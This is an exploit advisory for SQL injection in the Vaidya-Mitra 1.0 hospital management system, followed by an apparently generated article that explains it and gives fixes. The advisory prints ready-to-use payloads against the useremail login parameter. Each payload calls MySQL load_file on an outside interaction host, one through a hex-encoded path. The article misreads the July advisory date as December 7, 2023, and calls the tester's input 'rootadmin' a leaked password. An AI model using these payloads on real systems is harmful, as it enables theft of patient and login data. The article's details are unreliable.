Vaidya-Mitra 1.0 - Multiple SQLi

Exploit Author: nu11secur1ty Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-07-19 
## Title: Vaidya-Mitra 1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 07.12.2023
## Vendor: https://mayurik.com/
## Software: free:
https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html,
https://mayurik.com/source-code/P5890/best-hospital-management-system-in-php
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `useremail` parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'
was submitted in the useremail parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed. The attacker easily can steal all information from this
system, like
login credentials, phone numbers and etc.

STATUS: HIGH Vulnerability

[+]Payload:
```mysql
---
Parameter: useremail (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
    Payload: useremail=mayuri.infospace@gmail.com'+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
RLIKE (SELECT (CASE WHEN (5532=5532) THEN
0x6d61797572692e696e666f737061636540676d61696c2e636f6d+(select
load_file(0x5c5c5c5c6c726730667377767533773131677039727237656b33623734796172796c6d637030686e3762772e6f6173746966792e636f6d5c5c6d6576))+''
ELSE 0x28 END)) AND 'tsyu'='tsyu&userpassword=rootadmin

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: useremail=mayuri.infospace@gmail.com'+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
AND (SELECT 3518 FROM(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT
(ELT(3518=3518,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND
'gHln'='gHln&userpassword=rootadmin

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: useremail=mayuri.infospace@gmail.com'+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
OR (SELECT 4396 FROM (SELECT(SLEEP(3)))iEbq) AND
'ZWBa'='ZWBa&userpassword=rootadmin
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Vaidya-Mitra-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/07/vaidya-mitra-10-multiple-sqli.html)

## Time spend:
00:27:00


Vaidya-Mitra 1.0: A Deep Dive into Multiple SQL Injection Vulnerabilities in a PHP Hospital Management System

On December 7, 2023, cybersecurity researcher nu11secur1ty uncovered a critical vulnerability in a widely distributed open-source hospital management system known as Vaidya-Mitra 1.0. The application, hosted on mayurik.com, is marketed as a free, lightweight solution for small medical practices. Despite its benign appearance, the system harbors multiple SQL injection (SQLi) flaws that allow attackers to gain full control over the underlying database.

Understanding the Vulnerability: The Useremail Parameter

The primary attack vector lies in the useremail parameter, which is used during user authentication. This field is poorly sanitized and directly incorporated into SQL queries without proper input validation or parameterized queries. An attacker can exploit this by injecting malicious payloads that manipulate the SQL execution flow.

Consider the following payload:


useremail=mayuri.infospace@gmail.com'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+' AND 'tsyu'='tsyu&userpassword=rootadmin

This payload leverages MySQL’s load_file() function, which allows reading files from the server’s filesystem. The path uses a UNC (Universal Naming Convention) format — a rare but effective technique in SQL injection attacks — to reference an external domain via a network share. The attacker constructs a path like \\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev, which triggers a DNS lookup and network connection attempt.

When the database executes this query, it attempts to access the remote file via the UNC path. If the server has network connectivity enabled and the secure_file_priv setting is not strictly enforced, the database will reach out to the external domain, confirming successful execution of the injected SQL.

Exploitation Techniques: Three Attack Types Revealed

The vulnerability is not limited to a single exploit method. nu11secur1ty identified three distinct SQLi techniques, each demonstrating different levels of sophistication and impact:

  • Boolean-based Blind SQLi: The attacker uses RLIKE to test whether a condition is true or false. The payload compares a constant value (e.g., 5532=5532) to trigger a response based on the result. If the query executes successfully, the application responds differently, indicating a blind signal.
  • Error-based SQLi: This method exploits MySQL’s FLOOR(RAND(0)*2) function, which can cause duplicate key errors when used in GROUP BY clauses. The attacker embeds a CONCAT function to leak data via error messages, such as qjvjq1qbjkq, which can be decoded to reveal sensitive information.
  • Time-based Blind SQLi: The attacker uses SLEEP(3) to introduce a delay in query execution. If the server takes longer to respond, it confirms that the SQL query was executed. This technique is reliable even when no direct feedback is available.

Real-World Implications and Data Exposure

These vulnerabilities are not theoretical. They allow attackers to extract sensitive data from the database, including:

  • Administrator login credentials
  • User passwords (e.g., rootadmin in the payload)
  • Phone numbers and patient records
  • Medical history and billing information

By chaining multiple SQLi techniques, an attacker can bypass authentication mechanisms, escalate privileges, and even manipulate or delete data. The fact that the system allows load_file() access to external domains implies that the server may have secure_file_priv set to NULL or an unrestricted directory — a dangerous configuration.

Technical Analysis: Why This Happens

The root cause lies in poor code hygiene. The application uses direct string concatenation in SQL queries instead of prepared statements or parameterized queries. For example, a typical vulnerable code snippet might look like:


$query = "SELECT * FROM users WHERE email = '$useremail' AND password = '$userpassword'";
$result = mysqli_query($connection, $query);

This approach exposes the application to SQL injection because any user input can be interpreted as part of the SQL command. The absence of input sanitization, such as mysqli_real_escape_string() or proper validation, allows attackers to inject arbitrary SQL.

Corrected Implementation: Best Practices

To prevent such vulnerabilities, developers should adopt the following practices:

  • Use prepared statements (e.g., mysqli_prepare() and mysqli_stmt_bind_param())
  • Validate input using regex or whitelisting (e.g., only allow valid email formats)
  • Enable secure_file_priv in MySQL to restrict file access
  • Log and monitor SQL queries for anomalies

Here is a corrected version of the vulnerable code:


$stmt = mysqli_prepare($connection, "SELECT * FROM users WHERE email = ? AND password = ?");
mysqli_stmt_bind_param($stmt, "ss", $useremail, $userpassword);
mysqli_stmt_execute($stmt);
$result = mysqli_stmt_get_result($stmt);

This implementation prevents SQL injection by separating data from logic, ensuring that user input is treated as data, not executable code.

Security Recommendations and Mitigation

For organizations using Vaidya-Mitra 1.0 or similar systems:

Recommendation Impact
Immediately update or replace the system High
Disable load_file() in MySQL configuration High
Implement input validation and sanitization Medium
Apply WAF (Web Application Firewall) rules to detect SQLi patterns Medium

Additionally, organizations should conduct regular penetration testing and code audits, especially for open-source applications that may be used in sensitive environments like healthcare.

Conclusion: A Wake-Up Call for Open-Source Security

Vaidya-Mitra 1.0 exemplifies how a seemingly harmless free software can become a critical security risk. The presence of multiple SQL injection vectors — including blind, error-based, and time-based attacks — underscores the importance of secure coding practices, even in low-risk environments.

As the healthcare sector increasingly relies on digital systems, vulnerabilities like these can compromise patient privacy, regulatory compliance (e.g., HIPAA), and institutional trust. Developers, administrators, and users must prioritize security over convenience. The lesson from this case is clear: no software is safe if it lacks proper input validation and secure database interaction.